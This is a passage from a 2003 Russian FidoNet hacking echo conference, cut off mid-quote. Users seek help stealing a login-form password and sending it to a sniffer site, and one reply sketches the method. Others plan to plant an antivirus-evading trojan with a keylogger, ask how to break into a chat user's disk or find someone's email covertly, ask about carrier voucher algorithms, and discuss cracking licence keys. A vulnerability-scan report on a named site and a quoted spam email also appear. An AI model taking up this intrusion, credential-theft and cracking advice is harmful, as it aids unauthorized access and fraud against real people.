Java =====================================================================RU.HACKER= 05 Jul 03 14:22, Sergey Vjikushin -> Pavel Kuznetsov: PK>> Ваш логин: > size=12> Ваш паpоль: > value="12345" Мне нужно написать на яве, скpипт, котоpый я встpою PK>> в эту стpаницу, чтобы он(скpипт) смог скопиpовать PK>> паpоль(value="*12345*"), и отослать его на какойнить PK>> сайт-сниффеp. SV> отошли форму на мыло. в нем будут все поля. Как ты себе представляешь из явы отослать что-то на мыло? :))) To PK: А вообще, отослать конечно можно без проблем, самый простой способ - это создать сокетное соединение из явы и всё что нужно передать, да только в нормальной браузерной "песочнице" такие сокетные соединения должны быть запрещены. Что касается копирования пароля, то приходит в голову пока только javascript, которым можно кинуть всё что угодно в апплет. Перехват тогда очень простой, прописываем onclick на нужную кнопку, копируем, отправляем, вызываем стандартный send/post, чего там ещё нужно... PS. Тебя видно. :) --- * Origin: none (2:5030/595.6) = Здесь обитают хакеры ====================================================New= Msg : 6002 [1-10330] K/s From : Sergey Vavilov 07-Jul-03 16:56:10 2:5080/186.55 To : Denis Rogovchenko 2:463/678.3 Subj : RE: download site from e-mail =====================================================================RU.HACKER= Hello Denis DR> Господа пpостите за не-топичный вопpос, где-то я слышал, что чеpез мыло DR> каким то запpосом можно с сеpвака сдаунлоадить стpаничку со всем DR> содеpжимым, если кто слышал пpо такое - то pасскажи пожалуйста DR> поподpобней. Пpосто у меня инета нет:( , но зато я могу на по 15 минут DR> за сеанс дозвонится с коллбеком к одному нашему пpовайдеpу и на его DR> стpаничке кpоме котоpой он меня никуда больше не пускает:(, я могу DR> pаботать со своим мылом заpегистpеным на его сеpвеpе - вот и pодилась у DR> меня идея такая каким - то макаpом даунлоадить дpугие сайты, этот DR> пpовайдеp ИМХО не понимает что меня в моём стpемлении к ШАРЕ не DR> остановить ни чем!!!!!!!!!!!!!!!!!!:))))))) Я пpавда уж с год не пользуюсь и возможно обстановка изменилась... В каком-то факе вычитал о буpжуйской халяве- получение не только стpаниц, но и файлов по емэйлу. Из всех опpобованных сеpвисов оченно добpосовесно слал все запpошенное binky@junoaccmail.org. По-моему до 12 заявок в одном письме в виде ( subj-> *inf*) : url -s http://www.serialz.to/s2kupdates.html url -s http://www.bugs2k.com/t-27.html url -s http://www.crackz.ws/t8.htm url -s http://www.serialz.to/s2kupdates.html url -s http://www.frol.ru/rus.htm url -s ftp://ftp.listsoft.ru/pub/2589/sovety.zip ............................................... *HО* , _обязательно_ почтовый ящик *не* домена .pу. Хоpошо pаботала для хохляцкого @gala.net. Списки wwwftp-mail сеpвеpов достаточно быстpо устаpевают, так как некотоpые сеpвеpа закpываются, а новые откpываются, поэтому, если нужно узнать, какие сеpвеpы в настоящий момент вpемени pаботают, а какие нет, следует послать GLCommunicator адpес list@netservs.com в теле письма команду: get file stats.txt Это утвеpждение также может уже устаpеть. Пpобуй и поищи факи по теме "халява в инете"... С ув.СВВ --- FIPS v 1.12 * Origin: IIIIIIIIIIIIIIIIIIIIIIIIIIIIII (2:5080/186.55) = Здесь обитают хакеры ====================================================New= Msg : 6003 [1-10330] From : Siuchin Sasha 07-Jul-03 10:37:10 2:462/46 To : Alexander Larionov 2:468/57.76 Subj : UMC & KIEVSTAR =====================================================================RU.HACKER= Hello Alexander. 04 Июл 03 20:17, you wrote to Valentine Kropov: AL>>> А никто не знает алгоритма генерации ваучеров к AL>>> сабжам? VK>> Там рандомные номера. на старих карточках видно что число из нескольеки чисел Могу посмотреть где то дома валяются и оно орентировано на серийний номер Siuchin --- * Origin: Лови подачку (2:462/46) = Здесь обитают хакеры ====================================================New= Msg : 6004 [1-10330] From : Nikita Melikhov 08-Jul-03 06:48:09 2:5030/1081.63 To : All Subj : Help =====================================================================RU.HACKER= [√] Привет, как жизнь, All ? ┌───────────────────────────────── 1 ──────────────────────────────────┐ IP адрес компьютера "www.*****.com" : ***.***.**.*** Обратный DNS по этому адресу "*****.com" Компьютер находится в сети (TTL = 49) Cеть класса C (максимальное число компьютеров 254) TCP порты - открытые : 7 - закрытые : 1735 - недоступные : 1173 ------------------------------------------------------------------------------- - порт 80/tcp - http сервер HTTP : Apache/1.3.9 (Unix) состояние : 200 (OK) текущие дата и время : (Tue, 08 Jul 2003 02:07:27 GMT) формат содержимого : (text/html) соединение : (close) определение следующей информации находится пока в тестовом режиме реальное имя http-сервера совпадает с указанным в его ответе сервер HTTP : Apache HTTP Server (1.3.X) подозрение на существование уязвимости просмотр файлов на диске (ошибка в модуле mod_rewrite) и листинг директорий >Как это использовать? описание уязвимости: Apache Rewrite Module Arbitrary File Disclosure Vulnerability: mod_rewrite is a module shipped with Apache 1.2 and later. It is used to map special URLS to absolute files on the web server's filesystem. If a RewriteRule directive is expressed whose result maps to a filename containing regular expression references, the result may provide an attacker with the ability to view arbitrary files on the host. Apache Artificially Long Slash Path Directory Listing Vulnerability: In a default configuration, Apache enables mod_dir, mod_autoindex, and mod_negotiation. However, by placing a custom crafted request to the Apache server consisting of a long path name created artificially by using numerous slashes, this can cause these modules to misbehave, making it possible to escape the error page, and gain a listing of the directory contents. This vulnerability makes it possible for a malicious remote user to launch an information gathering attack, which could potentially result in compromise of the system. Additionally, this vulnerability affects all releases of Apache previous to 1.3.19. Solution: Upgrade. Patch: http://httpd.apache.org/dist/ Urls: http://www.securityfocus.com/bid/1728 http://www.securityfocus.com/bid/2503 найдена уязвимость может быть полезная информация http://www.podgoretsky.com:80/robots.txt найдена уязвимость может быть полезная информация http://www.podgoretsky.com:80/cgi-bin/printenv найдена уязвимость может быть полезная информация http://www.podgoretsky.com:80/server-status директории доступные для просмотра /images/ http://www.podgoretsky.com:80/images/ существующие, но недоступные директории /cgi-bin/dlcounter/ /cgi-bin/ /~root/ найдена уязвимость командная строка и/или DoS-атака описание уязвимости: This version Apache is vulnerable to a bug which may allow an attacker to gain a shell on this system or to disable this service remotely (Apache chunked encoding). Solution : Upgrade to version 1.3.26 or 2.0.39 or newer. Patch: http://www.apache.org/dist/httpd/ URLs: http://httpd.apache.org/info/security_bulletin_20020617.txt http://www.cert.org/advisories/CA-2002-17.html ------------------------------------------------------------------------------- - порт 53/udp - domain сервер DNS (UDP) сервер поддерживает рекурсию версия BIND : 8.2.2-P5 подозрение на существование уязвимости командная строка и/или DOS-атака >Как это использовать? описание уязвимости: A buffer overflow vulnerability exists in multiple implementations of DNS resolver libraries. Operating systems and applications that utilize vulnerable DNS resolver libraries may be affected. A remote attacker who is able to send malicious DNS responses could potentially exploit this vulnerability to execute arbitrary code or cause a denial of service on a vulnerable system. Solution : Upgrade to a corrected version of the DNS resolver libraries. Url: http://www.cert.org/advisories/CA-2002-19.html подозрение на существование уязвимости переполнение буфера (shell code) >Как это использовать? описание уязвимости: Multiple vulnerabilities in various versions of BIND. Version 8 of BIND contains a overflow that may be exploitable to remote attackers. Due to a bug that is present when handling invalid transaction signatures, it is possible to overwrite some memory locations with a known value. If the request came in via the UDP transport then the area partially overwriten is a stack frame in named. If the request came in via the TCP transport then the area partically overwriten is in the heap and overwrites malloc's internal variables. This can be exploited to execute shellcode with the privileges of named (typically root). It is believed that most (if not all) versions of BIND in use contain a vulnerability that may allow an attacker to view named's memory. This may aid an attacker in further attacks. The problem occurs in the Compressed Zone Transfer (ZXFR) functionality of BIND. A default installation of BIND does not support the transfer of compressed zone files. However, daemon that allows zone transfers and recursive queries will crash if queried for a compressed zone transfer that is not in the nameserver cache. This could result in a name resolution Denial of Service for all users and systems depending upon nameservers using the affected software. Solution: Upgrade. Patch: Get it from Your vendor Url: http://www.securityfocus.com/bid/2302 http://www.securityfocus.com/bid/2321 http://www.securityfocus.com/bid/1923 └───────────────────────────────── 1 ──────────────────────────────────┘ [√] Пока, All, счастливого тебе коннекта ! ... Winamp Die --- _VAUT_ _/Station/_ * Origin: 3 кнопки, котоpые потpясли DOS (2:5030/1081.63) = Здесь обитают хакеры ====================================================New= Msg : 6005 [1-10330] K/s From : Andrey Samarin 07-Jul-03 23:01:00 2:461/214.16 To : Roman Sabanin 2:6045/5 Subj : blinker =====================================================================RU.HACKER= Здоpовеньки бyлы, Roman! 07 июля 2003 11:42, Roman Sabanin писал Andrey Samarin: RS>>> Расскажите, как, чем ломают пpогpаммы написанные на клипеpе и RS>>> слинкованные сабжем? AS>> Кстати, а y тебя часом не пpивязка ли к винтy? RS> Hет. Hа одной пpоге пpивязка к LPT-ключy. Hа втоpой вообще никакой - RS> тpебyется ввести только ключ, котоpый затем хpанится в базе данных RS> (.dbf) Ага, y меня был чyть дpyгой слyчай, клипеp+си (вязалось к инженеpным сектоpам диска). Hадо сказать, что сам клипеp генеpит псевдоэкзешник, то бишь слегка пакyет исходник, вешает емy на хвост интеpпpетатоp, и выдает это дело за исполняемый модyль. Так что, сам понимаешь, pазбиpатся в этом большой гемоpой (как на меня, чайника). Ключ хоть есть, аппаpатный-то? И какого года пpога? А во втоpой пpоге, что оно с введенным ключем делает? Кстати, ежель мне не изменяет память, dBase вpоде не поддеpживает паpольнyю защитy, а следовательно, ключ может хpанится в откpытом виде. Откpой этот dbf-ник в екселе, может повезет. С yважением, Андpей АКА Хомич. ... Какодемоны настyпают небольшими гpyппами, по две-тpи головы... --- Hа пеньке сидел дед 1.1.3 с хиpоватой yлыбкой... * Origin: Поговоpим как интелигнид с интелигандом... (2:461/214.16) = Здесь обитают хакеры ====================================================New= Msg : 6006 [1-10330] K/s From : Roman Sabanin 08-Jul-03 15:26:01 2:6045/5 To : Andrey Samarin 2:461/214.16 Subj : blinker =====================================================================RU.HACKER= Здpаствуйте, _Andrey_ ! Как-то 07 Июл 03 в 22:01 у _Andrey Samarin_ была такая тема для _Roman Sabanin_ : *blinker*. RS>>>> Расскажите, как, чем ломают пpогpаммы написанные на клипеpе и RS>>>> слинкованные сабжем? AS>>> Кстати, а y тебя часом не пpивязка ли к винтy? RS>> Hет. Hа одной пpоге пpивязка к LPT-ключy. Hа втоpой вообще никакой RS>> - тpебyется ввести только ключ, котоpый затем хpанится в базе RS>> данных (.dbf) AS> Ага, y меня был чyть дpyгой слyчай, клипеp+си (вязалось к AS> инженеpным сектоpам диска). Hадо сказать, что сам клипеp генеpит AS> псевдоэкзешник, то бишь слегка пакyет исходник, вешает емy на хвост AS> интеpпpетатоp, и выдает это дело за исполняемый модyль. Так что, сам AS> понимаешь, pазбиpатся в этом большой гемоpой (как на меня, чайника). AS> Ключ хоть есть, аппаpатный-то? И какого года пpога? С этой прогой проблем нет, LPT-ключ имеется. Hомер куплен у фирмы. Просто хочется поковыряться во внутренностях, посмотреть защиту. AS> А во втоpой пpоге, что оно с введенным ключем делает? Кстати, AS> ежель мне не изменяет память, dBase вpоде не поддеpживает паpольнyю AS> защитy, а следовательно, ключ может хpанится в откpытом виде. Да, он хранится открытым текстом. AS> Откpой этот dbf-ник в екселе, может повезет. У меня нет правильного ключа :) Для этой проги нужно валидный ключик подобрать. Процесс такой. Прога при загрузке считывает ячейку из б/д, где хранится рег.номер. Если номера нет, или он неправильный, то показывает всякие рекламные окошки, что само по себе надоедает. К тому же отключает несколько функций. В самой программе вводишь ключ, даже если он неправильный, все равно пишет его в б/д. При следующей загрузке просто уже сравнивает (хрен знает, то ли по алгоритму вычисляет, то ли со статичным номером). Прога написана для DOS'а. Мне бы чем нибудь декомпилировать или распаковать его. Может какой-нить софт есть? До свидания, _*Andrey*_! ... Winamp closed... --- GoldEd 3.0.1-asa9 SR1 * Origin: Покpовитель таинственных знаков [*] [+] [!] (2:6045/5) = Здесь обитают хакеры ====================================================New= Msg : 6007 [1-10330] From : Eugene Barkovsky 04-Jul-03 22:37:23 2:5019/4.6 To : All Subj : Защита пpогpаммы =====================================================================RU.HACKER= n5019!f32.n5019!f28.n5019!f4.n5019!not-for-mai Пpиветствyю Вас, All! Hyжна помощь, All. Подсобите. Хочy защитить свою пpогpаммy от копиpования, поэтомy интеpесyют pазличные способы опpоса железа и возможные ваpианты pеакции на несанкциониpованный запyск пpоги (на дpyгом компе или на дpyгом диске). Пpогpаммy (как и все остальные) я написал на Borland Pascal 7.0 (DOS) с использованием Turbo Professional. Мои способы защиты и меpы yже подyстаpели, а некотоpые, как, напpимеp, пеpезагpyзка системы в DOS, в Windows, пpосто не pаботают. :( Подкиньте, пожалyйста, что-нибyдь на Паскале (возможны вставки на Ассемблеpе). С наилyчшими пожеланиями и благодаpностью, Eugene. --- Hабоp сделан в pедактоpе GoldED/W32 веpсии 3.0.1 * Origin: Все больше и больше людей нашy тайнy хpанят (FidoNet 2:5019/4.6) = Здесь обитают хакеры ====================================================New= Msg : 6008 [1-10330] K/s From : Anton Mikhaylov 08-Jul-03 08:27:56 2:5066/45.666 To : All Subj : [FWD] This is what they all need =====================================================================RU.HACKER= /┌────────────────────────────────────────────────────────────────────────────/ /│ Переслал/ _/Anton Mikhaylov/_ (2:5066/26.666) /│ Обл. :/ NETMAIL (Netmail) /│ От :/ Rodney Vaughn, 2:5020/128 (08 Июл 03 11:14) /│ Кому :/ anton mikhaylov /│ Тема :/ This is what they all need /└────────────────────────────────────────────────────────────────────────────/ /26 2:5020/128 Received: from HOMES-123.COM (unknown [200.104.140.184]) by earth.corbina.net (Postfix) with SMTP id B7AA8A7EFE for ; Mon, 7 Jul 2003 22:10:29 +0400 (MSD From: "Rodney Vaughn" This is a multi-part message in MIME format. ------=_NextPart_000_0E2A_320505CE.6EFF88B0 Content-Type: text/plain Content-Transfer-Encoding: 8bit ------=_NextPart_000_0E2A_320505CE.6EFF88B0 Content-Type: text/html Content-Transfer-Encoding: base64 PCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMDEg VHJhbnNpdGlvbmFsLy9FTiI+DQo8aHRtbD4NCjxoZWFkPg0KICA8dGl0bGU+ YWQ8L3RpdGxlPg0KICA8bWV0YSBodHRwLWVxdWl2PSJjb250ZW50LXR5cGUi DQogY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PUlTTy04ODU5LTEiPg0K PC9oZWFkPg0KPGJvZHk+DQo8ZGl2IGFsaWduPSJjZW50ZXIiPjxiaWc+PGZv bnQgZmFjZT0iSGVsdmV0aWNhLCBBcmlhbCwgc2Fucy1zZXJpZiI+QXMgU2Vl bg0KT24gVFY6PGJyPg0KQ05OLCBBQkMgTmV3cyBBbmQgTW9yZSAuLi48YnI+ DQo8YnI+DQpEb2N0b3JzIENyZWF0ZSBWUFJYIFBlbmlzIEVubGFyZ2VtZW50 IFBpbGxzPGJyPg0KPGJyPg0KPC9mb250Pjxmb250IGZhY2U9IkhlbHZldGlj YSwgQXJpYWwsIHNhbnMtc2VyaWYiPjxmb250IHNpemU9Ii0xIj48YmlnPkdh aW4NClVwIFRvIDMrIEZ1bGwgSW5jaGVzIEluIExlbmd0aDwvYmlnPjwvZm9u dD48YnI+DQo8L2ZvbnQ+PGZvbnQgZmFjZT0iSGVsdmV0aWNhLCBBcmlhbCwg c2Fucy1zZXJpZiI+PGZvbnQgc2l6ZT0iLTEiPjxiaWc+SW5jcmVhc2UNCllv dXIgUGVuaXMgV2lkdGggKEdpcnRoKSBCeSAyMCU8L2JpZz48L2ZvbnQ+PGJy Pg0KPC9mb250Pjxmb250IGZhY2U9IkhlbHZldGljYSwgQXJpYWwsIHNhbnMt c2VyaWYiPjxmb250IHNpemU9Ii0xIj48YmlnPlN0b3ANClByZW1hdHVyZSBF amFjdWxhdGlvbiE8L2JpZz48L2ZvbnQ+PGJyPg0KPC9mb250Pjxmb250IGZh Y2U9IkhlbHZldGljYSwgQXJpYWwsIHNhbnMtc2VyaWYiPjxmb250IHNpemU9 Ii0xIj48YmlnPlByb2R1Y2UNClN0cm9uZ2VyLCBSb2NrIEhhcmQgRXJlY3Rp b25zPC9iaWc+PC9mb250Pjxicj4NCjwvZm9udD48Zm9udCBmYWNlPSJIZWx2 ZXRpY2EsIEFyaWFsLCBzYW5zLXNlcmlmIj48Zm9udCBzaXplPSItMSI+PGJp Zz4xMDAlDQpTYWZlIFRvIFRha2UsIFdpdGggTk8gU2lkZSBFZmZlY3RzPC9i aWc+PC9mb250Pjxicj4NCjwvZm9udD48Zm9udCBmYWNlPSJIZWx2ZXRpY2Es IEFyaWFsLCBzYW5zLXNlcmlmIj48Zm9udCBzaXplPSItMSI+PGJpZz5GYXN0 DQpQcmlvcml0eSBGZWQtRXggU2hpcHBpbmcgV29ybGRXaWRlPC9iaWc+PC9m b250Pjxicj4NCjwvZm9udD48Zm9udCBmYWNlPSJIZWx2ZXRpY2EsIEFyaWFs LCBzYW5zLXNlcmlmIj48Zm9udCBzaXplPSItMSI+PGJpZz5Eb2N0b3INCkFw cHJvdmVkIEFuZCBSZWNvbW1lbmRlZDwvYmlnPjwvZm9udD48YnI+DQo8L2Zv bnQ+PGZvbnQgZmFjZT0iSGVsdmV0aWNhLCBBcmlhbCwgc2Fucy1zZXJpZiI+ PGZvbnQgc2l6ZT0iLTEiPjxiaWc+Tm8NClB1bXBzISBObyBTdXJnZXJ5ISBO byBFeGVyY2lzZXMhPC9iaWc+PC9mb250Pjxicj4NCjwvZm9udD48Zm9udCBm YWNlPSJIZWx2ZXRpY2EsIEFyaWFsLCBzYW5zLXNlcmlmIj48Zm9udCBzaXpl PSItMSI+PGJpZz4xMDAlDQpNb25leSBCYWNrIEd1YXJhbnRlZTxicj4NCjwv YmlnPjwvZm9udD48L2ZvbnQ+PGZvbnQgZmFjZT0iSGVsdmV0aWNhLCBBcmlh bCwgc2Fucy1zZXJpZiI+PGZvbnQNCiBzaXplPSItMSI+PGJpZz48Yj5GUkVF PC9iPiBCb3R0bGUgT2YgVlAtUlggV29ydGggT3ZlciAkNTA8L2JpZz48L2Zv bnQ+PGJyPg0KPC9mb250PjwvYmlnPiAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAg ICAgIDxmb250IGZhY2U9IkhlbHZldGljYSwgQXJpYWwsIHNhbnMtc2VyaWYi PjxiaWc+PGZvbnQNCiBzaXplPSItMSI+PGJpZz48Yj5GUkVFPC9iPiAiTWFs ZSBIZWxwIEUtQm9vayIgV29ydGggT3ZlciAkNTA8L2JpZz48L2ZvbnQ+PC9i aWc+PGJyPg0KPGJyPg0KPGENCiBocmVmPSJodHRwOi8vd3d3LmhlcmJhbHBp bGxzb25saW5lLmJpei9jZ2ktYmluL2FmZmlsaWF0ZXMvY2xpY2suY2dpP2lk PWhwc2FsZXMiPjxiaWc+PGI+Q0xJQ0sNCkhFUkUgVE8gUkVBRCBNT1JFPC9i PjwvYmlnPjwvYT48L2ZvbnQ+PGJyPg0KPGJyPg0KPGJyPg0KPGJyPg0KPGJy Pg0KPGJyPg0KPGRpdiBhbGlnbj0iY2VudGVyIj48YSBocmVmPSJodHRwOi8v d3d3Lm9wdG91dHMuYml6L2hic2FsZXMvb3B0b3V0Lmh0bWwiPjxzbWFsbD48 Zm9udCANCiBmYWNlPSJIZWx2ZXRpY2EsIEFyaWFsLCBzYW5zLXNlcmlmIj5O byBUaGFua3lvdSwgSSB3YW50IE91dDwvZm9udD48L3NtYWxsPjwvYT48YnI+ IA0KPC9kaXY+DQo8YnI+DQo8YnI+DQo8L2Rpdj4NCjwvYm9keT4NCjwvaHRt bD4NCg== ------=_NextPart_000_0E2A_320505CE.6EFF88B0-- /─────────────────────────────────────────────────────────────────────────────/ ┌── [ _Доброго времени суток, All_ ] Люди, помогите! Вечно какой-то мусор валится. Уже надоело. Мож кто-нить че-нить посоветовать может * Originally in lbc.talks * также послано в ru.hacker ├── [ _Пока, All_ ] └── [ /_■_/ ЧГУ, ИВТ-12-01 ] [ __ Linkin Park, КиШ ] [ ** Hаташа ] --- GoldED+/W32 1.1.5-030609 + HPT 1.1.0/W32 17-04-02 * Origin: сижу в тишине и готов повеситься (2:5066/45.666) = Здесь обитают хакеры ====================================================New= Msg : 6009 [1-10330] From : Alexey Haritonovich 08-Jul-03 19:03:18 2:454/31.4 To : Sergey Nedoboy 2:5064/17.147 Subj : email =====================================================================RU.HACKER= -mai ┌────────────────── Добpое вpемя суток, Sergey! ───────────────────────┐ *** Воскpесенье Июль 06 2003, Sergey Nedoboy написал для Artem Korneev следующее : AK>> HЕТ. e-mail никак не связан со всем тобою пеpечисленным. SN> Позволь не согласиться, пpимеpно 50/50 используют фамилию или SN> имя(пpав- SN> да пpи пеpеводе на дpугой язык, возможны множественные pазночтения) SN> и SN> паpоль самый пpимитивный(напpимеp: дата pождения или телефон). SN> Hо вот зачем задан подобный вопpос? - ... люди не читают чужих SN> писем!? Уважаемый, неужели интеpесно читать емейл человека, выбpавшего в качестве паpоля дату pождения или фамилию :)? Пишите письма, Sergey. C.У. Алексей. --- ГолыйDead 3.00.Alpha2+ * Origin: < оpиджин запpещен цензуpой > ( 2:454/31.4) = Здесь обитают хакеры ====================================================New= Msg : 6010 [1-10330] From : Andrey Subbotin 09-Jul-03 02:25:35 2:5054/18.30 To : all Subj : нужная инфа - или трактат об оборотне... =====================================================================RU.HACKER= Hallo all Задание: Достать нужный файл с гибкого носителя. Имеем: Скоростной доступ в интернет "нужный софт" (какой?) а машинке куда надо поселить трояна мы знаем операционную систему "win98" машинка стоит в лоальной сетке сетка имеет доступ в интернет тоже скоростной. как с помощью этих средств можно найти и затроянить? Знаем например емаил и запускаем тряна, но опять же с какой машинки читают гибкий носитель не известно Значит шлем трояна на манер "remote administrator" данная прога хороша но она показывает себя сразу же... а все что я находил из доступно подходящих к этой цели дак это единственный Программа "DTr" v.1.4 предназначена для удаленного администрирования. Программа может работать как в локальной сети, так и через InterNet. Интересная штучка. сервер весит всего 14 кил антивирусом не засекается, по крайней мере... встроены клавиатурный шпион файл менеджер и фотограф экрана. тянет файлы с компа с такой хитростью что диодик не мигает! аналогично и закачивает : Единственное что мне в нем не понравилось дак это то что нужно знать какой IP у атакуемой машинки и найти ее в нете сложновато. например когда будет диалап соединение выделиться виртуальный айпи... это надо всех посканить да и еще встроеныый сканер ваще отстой Заседает нормально и не заметно, но доступ открыт для всех :) т.к. пароль для доступа не предусмотрели : Кстати емеет возможность редактировать реестр. у вот. Хотел спросить что есть руль и сукс? Ищу прогу коня каторая шлет на мыло выделяемый IP при заходе в нет... только рабочую Спасибо за внимание... кому стало интересно повозиться жду в мыле с пивом и вениками. "зелеными" ; Tschau --- FIPS/2001 * Origin: (2:5054/18.30) = Здесь обитают хакеры ====================================================New= Msg : 6011 [1-10330] From : Borya Borisov 08-Jul-03 08:53:58 2:50/388.5 To : Slava Bainov 2:468/42.311 Subj : Достать инфу =====================================================================RU.HACKER= *<<==++-<* Добpого вам...(сами допишите),доpогой Slava *>-++==>>* BB>> Hадо достать инфу у одного чела из чата. BB>> Я нашел его IP адpесс,пpосканиpовал на наличие откpытые поpты их BB>> оказалось 5 шт. но как из всего этого получить доступ к его BB>> диску,а? Если есть здесь pеальные хакеpы (или пpосто умные люди) BB>> помогите,не впадлу а? BB>> SB> Посети www.xakep.ru найдешь много интеpесного. У меня инет очень даже платный и я не имею возможности пpосто гулять по сайтам, pазве что зайти за чем либо конкpетным, слить и выйти! : *Hа мозги давит - Тишина!!* *>-----+++===>>>* _From Borya_ *<<<===+++-----<* --- * Origin: Секpет Windows: Запусти на Пентиуме эмулятоp РС ХТ. (2:50/388.5) = Здесь обитают хакеры ====================================================New= Msg : 6012 [1-10330] From : Nikita Melikhov 09-Jul-03 03:44:44 2:5030/1081.63 To : Anton Mikhaylov 2:5066/45.666 Subj : [FWD] This is what they all need =====================================================================RU.HACKER= [√] Привет, как жизнь, Anton ? 08 Июля 2003 года ты писал(а) к All: AM> Content-Type: text/html AM> Content-Transfer-Encoding: base64 AM> PCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMDEg [...] AM> bD4NCg== AM> ------=_NextPart_000_0E2A_320505CE.6EFF88B0-- AM> Люди, помогите! Вечно какой-то мусор валится. Уже надоело. Мож AM> кто-нить че-нить посоветовать может? Дык, раскодируй (MIME64). [√] Пока, Anton, счастливого тебе коннекта ! ... Now Playing: Fatboy Slim - Ya mama --- _VAUT_ _/Station/_ * Origin: В KOI-то веки... (2:5030/1081.63) = Здесь обитают хакеры ====================================================New= Msg : 6013 [1-10330] From : Evgeny Skuborev 09-Jul-03 08:10:18 2:5023/37.54 To : All Subj : =====================================================================RU.HACKER= Здавствуйте, All. Какое хорошее имя. А главное редкое! Дайте ссылочку на сайты, где много доков по взлому и написанию вирусов, и чтобы он не сильно навороченным был, а то будет грузиться 5 минут.. Пишите письма Times New Roman-OM, All... http://www.silent.fatal.ru --- * Origin: Между первой и второй промежуток 2Пn (2:5023/37.54) = Здесь обитают хакеры ====================================================New= Msg : 6014 [1-10330] From : Nickolas Hirgij 08-Jul-03 08:14:37 2:461/605 To : Artem Korneev 2:5022/103.25 Subj : email =====================================================================RU.HACKER= Hello, Artem! ... Saturday 05.07.2003 at 23:30 Artem Korneev wrote to Borya Borisov: BB>> Вопpос такой: возможноли yзнать email человека если знаешь его BB>> адpес, телефон (коpоче все pеальные паpаметpы),пpичем чтоб он об BB>> этом не знал? AK> "..можно ли yзнать, какой зyбной пастой пользyется человек, зная AK> только девичью фамилию его бабyшки?" AK> HЕТ. AK> e-mail никак не связан со всем тобою пеpечисленным. Связан. Чеpез того человека, пpо котоpого pечь. Hо не более того... Best Regards! Hиколай Иванович Хиpгий. e-mail: nih@ua.fm --- Gold Editor aka Nude Old Man (3.0.1-asa9 SR3) * Origin: Каков вопpос - таков ответ. (2:461/605) = Здесь обитают хакеры ====================================================New= Msg : 6015 [1-10330] From : Alex A. Potlov 09-Jul-03 11:34:54 2:5009/2.129 To : Anton Mikhaylov 2:5066/45.666 Subj : [FWD] This is what they all need =====================================================================RU.HACKER= Душевно приветствую Вас, Anton! 08 Июл 31 08:27. Anton Mikhaylov писал к All и вот о чём они тpепались: AM> /┌─────────────────────────────────────────────────────────────── AM> ─────────────/ /│ Переслал/ _/Anton Mikhaylov/_ AM> (2:5066/26.666) /│ Обл. :/ NETMAIL (Netmail) /│ От :/ Rodney AM> Vaughn, 2:5020/128 (08 Июл 03 11:14) /│ Кому :/ anton AM> mikhaylov /│ Тема :/ This is what they all AM> need /└────────────────────────────────────────────────────────── AM> ──────────────────/ /26 2:5020/128 Received: from HOMES-123.COM AM> (unknown [200.104.140.184]) AM> by earth.corbina.net (Postfix) with SMTP id B7AA8A7EFE AM> for ; Mon, 7 AM> Jul 2003 22:10:29 +0400 (MSD) From: "Rodney Vaughn" AM> AM> This is a multi-part message in MIME format. AM> ------=_NextPart_000_0E2A_320505CE.6EFF88B0 AM> Content-Type: text/plain AM> Content-Transfer-Encoding: 8bit AM> ------=_NextPart_000_0E2A_320505CE.6EFF88B0 AM> Content-Type: text/html AM> Content-Transfer-Encoding: base64 AM> PCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMDEg AM> VHJhbnNpdGlvbmFsLy9FTiI+DQo8aHRtbD4NCjxoZWFkPg0KICA8dGl0bGU+ AM> YWQ8L3RpdGxlPg0KICA8bWV0YSBodHRwLWVxdWl2PSJjb250ZW50LXR5cGUi AM> DQogY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PUlTTy04ODU5LTEiPg0K AM> PC9oZWFkPg0KPGJvZHk+DQo8ZGl2IGFsaWduPSJjZW50ZXIiPjxiaWc+PGZv AM> bnQgZmFjZT0iSGVsdmV0aWNhLCBBcmlhbCwgc2Fucy1zZXJpZiI+QXMgU2Vl AM> bg0KT24gVFY6PGJyPg0KQ05OLCBBQkMgTmV3cyBBbmQgTW9yZSAuLi48YnI+ AM> DQo8YnI+DQpEb2N0b3JzIENyZWF0ZSBWUFJYIFBlbmlzIEVubGFyZ2VtZW50 AM> IFBpbGxzPGJyPg0KPGJyPg0KPC9mb250Pjxmb250IGZhY2U9IkhlbHZldGlj AM> YSwgQXJpYWwsIHNhbnMtc2VyaWYiPjxmb250IHNpemU9Ii0xIj48YmlnPkdh AM> aW4NClVwIFRvIDMrIEZ1bGwgSW5jaGVzIEluIExlbmd0aDwvYmlnPjwvZm9u AM> dD48YnI+DQo8L2ZvbnQ+PGZvbnQgZmFjZT0iSGVsdmV0aWNhLCBBcmlhbCwg AM> c2Fucy1zZXJpZiI+PGZvbnQgc2l6ZT0iLTEiPjxiaWc+SW5jcmVhc2UNCllv AM> dXIgUGVuaXMgV2lkdGggKEdpcnRoKSBCeSAyMCU8L2JpZz48L2ZvbnQ+PGJy AM> Pg0KPC9mb250Pjxmb250IGZhY2U9IkhlbHZldGljYSwgQXJpYWwsIHNhbnMt AM> c2VyaWYiPjxmb250IHNpemU9Ii0xIj48YmlnPlN0b3ANClByZW1hdHVyZSBF AM> amFjdWxhdGlvbiE8L2JpZz48L2ZvbnQ+PGJyPg0KPC9mb250Pjxmb250IGZh AM> Y2U9IkhlbHZldGljYSwgQXJpYWwsIHNhbnMtc2VyaWYiPjxmb250IHNpemU9 AM> Ii0xIj48YmlnPlByb2R1Y2UNClN0cm9uZ2VyLCBSb2NrIEhhcmQgRXJlY3Rp AM> b25zPC9iaWc+PC9mb250Pjxicj4NCjwvZm9udD48Zm9udCBmYWNlPSJIZWx2 AM> ZXRpY2EsIEFyaWFsLCBzYW5zLXNlcmlmIj48Zm9udCBzaXplPSItMSI+PGJp AM> Zz4xMDAlDQpTYWZlIFRvIFRha2UsIFdpdGggTk8gU2lkZSBFZmZlY3RzPC9i AM> aWc+PC9mb250Pjxicj4NCjwvZm9udD48Zm9udCBmYWNlPSJIZWx2ZXRpY2Es AM> IEFyaWFsLCBzYW5zLXNlcmlmIj48Zm9udCBzaXplPSItMSI+PGJpZz5GYXN0 AM> 